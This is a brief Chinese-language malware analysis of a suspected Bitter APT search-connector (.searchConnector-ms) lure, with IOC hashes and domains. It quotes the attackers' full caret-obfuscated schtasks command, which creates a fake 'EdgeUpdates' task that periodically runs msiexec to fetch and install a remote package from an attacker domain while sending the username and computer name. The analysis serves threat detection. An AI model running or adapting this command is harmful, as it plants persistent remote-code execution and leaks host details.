搜索连接器——疑似蔓灵花恶意文件

恶意文件基本情况如下：

文件为搜索连接器文件 (.searchConnector-ms)，官方文档：

https://learn.microsoft.com/zh-cn/windows/win32/search/search-sconn-desc-schema-entry#what-are-search-connectors

可以看出攻击者针对的是win10以上系统用户

文件会通过Windows资源管理器请求远程地址htt^p://atocguserservice.com/res2/2/1/ 获取下一步的病毒文件

获取的rar中包含docx文件，但是文件实际为纯文本 THIS IS A README FILE。

恶意文件功能主要集中在LNK文件，其中包含恶意cmd命令（同蔓灵花CHM文件执行的命令）

schtasks /create /sc minute /mo 15 /f /tn EdgeUpdates /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i  h^tt^p://^w^e^b^a^n^d^e^r^s^o^n^d^e^s^i^g^n.^c^o^m/^z^a^r^a/jkl.p^h^p?p^i=%username%*%computername% /^q^n ^/^norestart"

创建EdgeUpdates计划任务

同样单次请求失败

新手法新方式免杀隐蔽性OK

IOCs：

7A956665925548CC805A4EA090B0341A

webandersondesign.com

atocguserservice.com